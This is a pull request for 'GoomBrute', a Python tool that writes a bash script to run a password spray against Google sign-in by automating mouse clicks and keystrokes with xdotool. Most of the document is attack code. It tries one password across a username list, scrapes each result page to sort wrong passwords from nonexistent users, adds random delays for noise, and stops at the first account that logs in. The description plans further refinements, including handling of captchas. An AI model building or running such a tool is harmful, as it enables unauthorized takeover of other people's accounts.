### PR TITLE
First functioning version of GoomBrute

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,5 +1,1 @@
 test
-users.txt
-password.txt
-output
-*.sh

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -101,7 +101,7 @@ for user in usernames:
     commands.append(f"xdotool mousemove {blank} click 1 key ctrl+a")
     
     name = user.split("@")[1]
-    commands.append(f"xclip -o > {output_dir}/{name}.txt")
+    commands.append(f"xclip -o > \"{output_dir}/{name}.txt\"")
 
     # Add a delay
     commands.append(f"sleep {delay}")

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -10,8 +10,8 @@
 
 _DEV_ = True
 
-from random import randrange
-from pathlib import Path
+from random import randrange # to generate noise
+from pathlib import Path # to handle files
 
 # OPTIONS
 user_list = "users.txt"
@@ -53,16 +53,18 @@ clear_ext = "1213 93"
 
 all_data = "988 191"
 
-
+# Generates a value for creating noise between request delays.
+# This is a function instead of a variable so that a new random
+# is generated upon each call.
 def add_noise():
     return randrange(0, 15)/10
 
+# Sets the request delay.
 def wait_load():
     return 3
 
 
 # Load the usernames from file into a list.
-
 print(f"Loading username file '{user_list}'...")
 usernames = []
 with open(user_list, "r") as user_file:
@@ -120,6 +122,8 @@ for user in usernames:
 process_output = []
 process_output.append(f"for file in `ls {output_dir}`")
 process_output.append("do")
+
+# Check whether a wrong password was submitted.
 process_output.append(f"result=`cat {output_dir}/$file | grep -i 'Wrong password. Try again' | wc -c`")
 process_output.append("if [ $result -eq 0 ]")
 process_output.append("then")
@@ -129,6 +133,7 @@ process_output.append("echo \"$file Wrong Password :(\"")
 process_output.append("fi")
 process_output.append("done")
 
+# Write the executable bash script.
 print(f"Writing to '{target_filename}'...\n")
 with open(target_filename, 'w') as output_file:
     print('#!/bin/bash')

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -146,7 +146,7 @@ for user in usernames:
     
     commands.append("if [ $success = true ]")
     commands.append("then")
-    commands.append(f"echo \"{user} Success {password}\" >> {output_dir}/results.txt")
+    commands.append(f"echo \"{user} Success\" >> {output_dir}/results.txt")
     commands.append("exit")
     commands.append("else")
     commands.append(f"echo \"{user} Failure\" >> {output_dir}/results.txt")

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -109,7 +109,7 @@ for user in usernames:
 # Process raw output into a readable, exportable results file
 process_output = []
 process_output.append(f"for file in `ls {output_dir}`; do")
-process_output.append(f"result=`cat {output_dir}/$file | grep -i 'Wrong password. Try again' | wc -c")
+process_output.append(f"result=`cat {output_dir}/$file` | grep -i 'Wrong password. Try again' | wc -c")
 process_output.append("if [ $result -eq 0 ]; then; echo \"$file Success :D\"; else; echo \"$file Wrong Password :(\"")
 
 

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -135,6 +135,15 @@ for user in usernames:
     commands.append("else")
     commands.append("show_pass=true")
     commands.append("fi")
+ 
+    # Check whether the user does not exist.
+    commands.append(f"result=`cat {output_dir}/{name}.txt | grep -i 'signed in to Google products like YouTube, try again with that email' | wc -c`")
+    commands.append("if [ $result -eq 0 ]")
+    commands.append("then")
+    commands.append("invalid_user=false")
+    commands.append("else")
+    commands.append("invalid_user=true")
+    commands.append("fi")
     
     # Determine whether the login was successful.
     commands.append("if [ $show_pass = true ] || [ $incorrect_pass = true ]")
@@ -146,9 +155,14 @@ for user in usernames:
     
     commands.append("if [ $success = true ]")
     commands.append("then")
+    commands.append("if [ $invalid_user = false]")
+    commands.append("then")
     commands.append(f"echo \"{user} Success\" >> {output_dir}/results.txt")
     commands.append(f"cat {output_dir}/results.txt")
     commands.append("exit")
+    commands.append("else")
+    commands.append(f"echo \"{user} INVALID_USER\" >> {output_dir}/results.txt")
+    commands.append("fi")    
     commands.append("else")
     commands.append(f"echo \"{user} Failure\" >> {output_dir}/results.txt")
     commands.append("fi")

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -110,7 +110,7 @@ for user in usernames:
 process_output = []
 process_output.append(f"for file in `ls {output_dir}`; do")
 process_output.append(f"result=`cat {output_dir}/$file | grep -i 'Wrong password. Try again' | wc -c")
-process_output.append("if [ $result -eq 0 ]; then; echo `$file Success :D`; else; echo `$file Wrong Password :('")
+process_output.append("if [ $result -eq 0 ]; then; echo `\"$file\" Success :D`; else; echo `\"$file\" Wrong Password :('")
 
 
 

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -114,24 +114,51 @@ for user in usernames:
     # Add a delay
     commands.append(f"sleep {delay}")
     
-    commands.append(f"xdotool mousemove {clear_ext} click 1")
     commands.append(f"sleep {wait_load}")
     commands.append(f"xdotool mousemove {all_data} click 1")
+    
+    # Process page result.
+    # Check whether a wrong password was submitted.
+    commands.append(f"result=`cat {output_dir}/$file | grep -i 'Wrong password. Try again' | wc -c`")
+    commands.append("if [ $result -eq 0 ]")
+    commands.append("then")
+    commands.append("incorrect_pass=False")
+    commands.append("else")
+    commands.append("incorrect_pass=True")
+    commands.append("fi")
+    commands.append("done")
+    
+    # Check whether a show password option exists.
+    commands.append(f"result=`cat {output_dir}/$file | grep -i 'show password' | wc -c`")
+    commands.append("if [ $result -eq 0 ]")
+    commands.append("then")
+    commands.append("else")
+    commands.append("show_pass=true")
+    commands.append("fi")
+    commands.append("done")
+    
+    # Determine whether the login was successful.
+    commands.append("if [ $show_pass = true ] || [ $incorrect_pass = true ]")
+    commands.append("then")
+    commands.append("success=False")
+    commands.append("else")
+    commands.append("success=True")
+    commands.append("fi")
+    commands.append("done")
+    
+    commands.append("if [ $success = True ]")
+    commands.append("then")
+    commands.append(f"echo \"{user} Success {password}\" {output_dir}/results.txt")
+    commands.append("else")
+    commands.append(f"echo \"{user} Failure\" {output_dir}/results.txt")
+    commands.append("fi")
     
 # Process raw output into a readable, exportable results file
 process_output = []
 process_output.append(f"for file in `ls {output_dir}`")
 process_output.append("do")
 
-# Check whether a wrong password was submitted.
-process_output.append(f"result=`cat {output_dir}/$file | grep -i 'Wrong password. Try again' | wc -c`")
-process_output.append("if [ $result -eq 0 ]")
-process_output.append("then")
-process_output.append("echo \"$file Success :D\"")
-process_output.append("else")
-process_output.append("echo \"$file Wrong Password :(\"")
-process_output.append("fi")
-process_output.append("done")
+
 
 # Write the executable bash script.
 print(f"Writing to '{target_filename}'...\n")

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -71,7 +71,8 @@ print("Creating xdotool sh command list...")
 commands = []
 
 for user in usernames:
-    # Navigate to the desired login portal
+    # Navigate to the desired login portal'
+    user = "".join(user.split())
     commands.append(f"xdotool mousemove {search} click 1 key ctrl+a")
     commands.append("xdotool key 'Delete'")
     commands.append(f"xdotool mousemove {search} click 1 type '{target_url}'")
@@ -100,7 +101,7 @@ for user in usernames:
     # Save page results
     commands.append(f"xdotool mousemove {blank} click 1 key ctrl+a")
     
-    name = user.split("@")[1]
+    name = user.split("@")[0]
     commands.append(f"xclip -o > \"{output_dir}/{name}.txt\"")
 
     # Add a delay
@@ -109,8 +110,8 @@ for user in usernames:
 # Process raw output into a readable, exportable results file
 process_output = []
 process_output.append(f"for file in `ls {output_dir}`; do")
-process_output.append(f"result=`cat {output_dir}/$file` | grep -i 'Wrong password. Try again' | wc -c")
-process_output.append("if [ $result -eq 0 ]; then; echo \"$file Success :D\"; else; echo \"$file Wrong Password :(\"")
+process_output.append(f"result=`cat {output_dir}/$file | grep -i 'Wrong password. Try again' | wc -c`")
+process_output.append("if [ $result -eq 0 ]; then; echo \"$file Success :D\"; else; echo \"$file Wrong Password :(\"; fi")
 
 
 print(f"Writing to '{target_filename}'...\n")

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -49,6 +49,10 @@ source = "922 346"
 
 output_dir = "GoomBruteOutput"
 
+clear_ext = "1213 93"
+
+all_data = "988 191"
+
 
 def add_noise():
     return randrange(0, 15)/10
@@ -107,6 +111,10 @@ for user in usernames:
 
     # Add a delay
     commands.append(f"sleep {delay}")
+    
+    commands.append(f"xdotool mousemove {clear_ext} click 1")
+    commands.append(f"sleep {add_noise()}")
+    commands.append(f"xdotool mousemove {all_data} click 1")
     
 # Process raw output into a readable, exportable results file
 process_output = []

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -152,12 +152,6 @@ for user in usernames:
     commands.append(f"echo \"{user} Failure\" >> {output_dir}/results.txt")
     commands.append("fi")
     
-# Process raw output into a readable, exportable results file
-process_output = []
-process_output.append(f"for file in `ls {output_dir}`")
-process_output.append("do")
-
-
 
 # Write the executable bash script.
 print(f"Writing to '{target_filename}'...\n")
@@ -169,9 +163,3 @@ with open(target_filename, 'w') as output_file:
         print(line)
         output_file.write(line)
         output_file.write('\n')
-        
-    for line in process_output:
-        print(line)
-        output_file.write(line)
-        output_file.write('\n')
-

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -45,11 +45,7 @@ password_field = "820 454"
 # Blank area "x y" coordinates
 blank = "713 182"
 
-source = "922 346"
-
 output_dir = "GoomBruteOutput"
-
-clear_ext = "1213 93"
 
 all_data = "988 191"
 

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -113,7 +113,7 @@ for user in usernames:
     commands.append(f"sleep {delay}")
     
     commands.append(f"xdotool mousemove {clear_ext} click 1")
-    commands.append(f"sleep {add_noise()}")
+    commands.append(f"sleep {wait_load}")
     commands.append(f"xdotool mousemove {all_data} click 1")
     
 # Process raw output into a readable, exportable results file

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -149,6 +149,7 @@ for user in usernames:
     commands.append("if [ $success = True ]")
     commands.append("then")
     commands.append(f"echo \"{user} Success {password}\" {output_dir}/results.txt")
+    commands.append("exit")
     commands.append("else")
     commands.append(f"echo \"{user} Failure\" {output_dir}/results.txt")
     commands.append("fi")

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -112,7 +112,7 @@ process_output = []
 process_output.append(f"for file in `ls {output_dir}`; do")
 process_output.append(f"result=`cat {output_dir}/$file | grep -i 'Wrong password. Try again' | wc -c`")
 process_output.append("if [ $result -eq 0 ]; then; echo \"$file Success :D\"; else; echo \"$file Wrong Password :(\"; fi")
-
+process_output.append("done")
 
 print(f"Writing to '{target_filename}'...\n")
 with open(target_filename, 'w') as output_file:

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -68,11 +68,9 @@ print("Here are the first few usernames: " + str(usernames[0:5]))
 
 print("Creating xdotool sh command list...")
 
-count = 0
 commands = []
 
 for user in usernames:
-    count += 1
     # Navigate to the desired login portal
     commands.append(f"xdotool mousemove {search} click 1 key ctrl+a")
     commands.append("xdotool key 'Delete'")
@@ -101,12 +99,19 @@ for user in usernames:
     
     # Save page results
     commands.append(f"xdotool mousemove {blank} click 1 key ctrl+a")
-    commands.append(f"xclip -o > {output_dir}/raw-output{count}.txt")
+    
+    name = user.split("@")[1]
+    commands.append(f"xclip -o > {output_dir}/{name}.txt")
 
     # Add a delay
     commands.append(f"sleep {delay}")
     
-    
+# Process raw output into a readable, exportable results file
+process_output = []
+process_output.append(f"for file in `ls {output_dir}`; do")
+process_output.append(f"result=`cat {output_dir}/$file | grep -i 'Wrong password. Try again' | wc -c")
+process_output.append("if [ $result -eq 0 ]; then; echo `$file Success :D`; else; echo `$file Wrong Password :('")
+
 
 
 
@@ -116,6 +121,11 @@ with open(target_filename, 'w') as output_file:
     output_file.write("#!/bin/bash\n")
     output_file.write("mkdir {output_dir}\n")
     for line in commands:
+        print(line)
+        output_file.write(line)
+        output_file.write('\n')
+        
+    for line in process_output:
         print(line)
         output_file.write(line)
         output_file.write('\n')

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -147,11 +147,12 @@ for user in usernames:
     commands.append("if [ $success = true ]")
     commands.append("then")
     commands.append(f"echo \"{user} Success\" >> {output_dir}/results.txt")
+    commands.append(f"cat {output_dir}/results.txt")
     commands.append("exit")
     commands.append("else")
     commands.append(f"echo \"{user} Failure\" >> {output_dir}/results.txt")
     commands.append("fi")
-    
+        
 
 # Write the executable bash script.
 print(f"Writing to '{target_filename}'...\n")
@@ -163,3 +164,4 @@ with open(target_filename, 'w') as output_file:
         print(line)
         output_file.write(line)
         output_file.write('\n')
+    output_file.write(f"cat {output_dir}/results.txt")

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -22,6 +22,7 @@ path = Path("password.txt")
 if path.is_file() and _DEV_ == True:
     with open("password.txt",'r') as pass_file:
         password = pass_file.readline()
+        password = "".join(password.split())
         
 
 
@@ -109,9 +110,15 @@ for user in usernames:
     
 # Process raw output into a readable, exportable results file
 process_output = []
-process_output.append(f"for file in `ls {output_dir}`; do")
+process_output.append(f"for file in `ls {output_dir}`")
+process_output.append("do")
 process_output.append(f"result=`cat {output_dir}/$file | grep -i 'Wrong password. Try again' | wc -c`")
-process_output.append("if [ $result -eq 0 ]; then; echo \"$file Success :D\"; else; echo \"$file Wrong Password :(\"; fi")
+process_output.append("if [ $result -eq 0 ]")
+process_output.append("then")
+process_output.append("echo \"$file Success :D\"")
+process_output.append("else")
+process_output.append("echo \"$file Wrong Password :(\"")
+process_output.append("fi")
 process_output.append("done")
 
 print(f"Writing to '{target_filename}'...\n")

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -146,10 +146,10 @@ for user in usernames:
     
     commands.append("if [ $success = true ]")
     commands.append("then")
-    commands.append(f"echo \"{user} Success {password}\" {output_dir}/results.txt")
+    commands.append(f"echo \"{user} Success {password}\" >> {output_dir}/results.txt")
     commands.append("exit")
     commands.append("else")
-    commands.append(f"echo \"{user} Failure\" {output_dir}/results.txt")
+    commands.append(f"echo \"{user} Failure\" >> {output_dir}/results.txt")
     commands.append("fi")
     
 # Process raw output into a readable, exportable results file

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -114,39 +114,37 @@ for user in usernames:
     # Add a delay
     commands.append(f"sleep {delay}")
     
-    commands.append(f"sleep {wait_load}")
+    commands.append(f"sleep {wait_load()}")
     commands.append(f"xdotool mousemove {all_data} click 1")
     
     # Process page result.
     # Check whether a wrong password was submitted.
-    commands.append(f"result=`cat {output_dir}/$file | grep -i 'Wrong password. Try again' | wc -c`")
+    commands.append(f"result=`cat {output_dir}/{name}.txt | grep -i 'Wrong password. Try again' | wc -c`")
     commands.append("if [ $result -eq 0 ]")
     commands.append("then")
-    commands.append("incorrect_pass=False")
+    commands.append("incorrect_pass=false")
     commands.append("else")
-    commands.append("incorrect_pass=True")
+    commands.append("incorrect_pass=true")
     commands.append("fi")
-    commands.append("done")
     
     # Check whether a show password option exists.
-    commands.append(f"result=`cat {output_dir}/$file | grep -i 'show password' | wc -c`")
+    commands.append(f"result=`cat {output_dir}/{name}.txt | grep -i 'show password' | wc -c`")
     commands.append("if [ $result -eq 0 ]")
     commands.append("then")
+    commands.append("show_pass=false")
     commands.append("else")
     commands.append("show_pass=true")
     commands.append("fi")
-    commands.append("done")
     
     # Determine whether the login was successful.
     commands.append("if [ $show_pass = true ] || [ $incorrect_pass = true ]")
     commands.append("then")
-    commands.append("success=False")
+    commands.append("success=false")
     commands.append("else")
-    commands.append("success=True")
+    commands.append("success=true")
     commands.append("fi")
-    commands.append("done")
     
-    commands.append("if [ $success = True ]")
+    commands.append("if [ $success = true ]")
     commands.append("then")
     commands.append(f"echo \"{user} Success {password}\" {output_dir}/results.txt")
     commands.append("exit")

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -46,6 +46,8 @@ blank = "713 182"
 
 source = "922 346"
 
+output_dir = "GoomBruteOutput"
+
 
 def add_noise():
     return randrange(0, 15)/10
@@ -99,17 +101,20 @@ for user in usernames:
     
     # Save page results
     commands.append(f"xdotool mousemove {blank} click 1 key ctrl+a")
-    commands.append(f"xclip -o > GoomBruteOutput/raw-output{count}.txt")
+    commands.append(f"xclip -o > {output_dir}/raw-output{count}.txt")
 
     # Add a delay
     commands.append(f"sleep {delay}")
+    
+    
+
 
 
 print(f"Writing to '{target_filename}'...\n")
 with open(target_filename, 'w') as output_file:
     print('#!/bin/bash')
     output_file.write("#!/bin/bash\n")
-    output_file.write("mkdir GoomBruteOutput\n")
+    output_file.write("mkdir {output_dir}\n")
     for line in commands:
         print(line)
         output_file.write(line)

--- a/GoomBrute.py
+++ b/GoomBrute.py
@@ -110,16 +110,14 @@ for user in usernames:
 process_output = []
 process_output.append(f"for file in `ls {output_dir}`; do")
 process_output.append(f"result=`cat {output_dir}/$file | grep -i 'Wrong password. Try again' | wc -c")
-process_output.append("if [ $result -eq 0 ]; then; echo `\"$file\" Success :D`; else; echo `\"$file\" Wrong Password :('")
-
-
+process_output.append("if [ $result -eq 0 ]; then; echo \"$file Success :D\"; else; echo \"$file Wrong Password :(\"")
 
 
 print(f"Writing to '{target_filename}'...\n")
 with open(target_filename, 'w') as output_file:
     print('#!/bin/bash')
     output_file.write("#!/bin/bash\n")
-    output_file.write("mkdir {output_dir}\n")
+    output_file.write(f"mkdir {output_dir}\n")
     for line in commands:
         print(line)
         output_file.write(line)


### PR DESCRIPTION
This version of GoomBrute performs a password spray against a given user list with a given password. It stops after the first success and identifies invalid users. Appropriate mouselocations for buttons must be manually set for each run and monitor.

Areas to improve:

- Captcha prompts are recorded as invalid password attempts. This should probably instead trigger an alert and end the script so as not to uselessly spray captchas.
- Having the entire bash script hard coded into the python for loop is inelegant, hard to read, and hard to test. Maybe move it to its own file and have it read in instead? 
- It makes much more sense to have the password and domain taken as arguments rather than set in the code.

